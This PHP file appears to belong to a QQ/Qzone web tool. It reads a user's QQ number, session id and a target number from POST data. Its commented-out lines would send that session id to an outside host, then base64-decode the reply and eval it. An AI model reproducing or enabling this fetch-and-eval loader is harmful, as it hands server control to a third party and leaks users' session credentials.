<?php

function get_curl($url, $post = 0)
{
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);

	if ($post) {
		curl_setopt($ch, CURLOPT_POST, 1);
		curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
	}

	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	$ret = curl_exec($ch);
	curl_close($ch);
	return $ret;
}

session_start();
$uin = $_POST["uin"];
$sid = $_POST["sid"];
$touin = $_POST["touin"];
//$config = require ("../../Application/Common/Conf/sq.php");
//$php = get_curl("http://qzone.iwyd.cn/api/dx/qqdel.php?uin=$uin&sid=$sid&touin=$touin&websid=" . $config["WEB_SQM"]);
//@eval (base64_decode($php));

?>
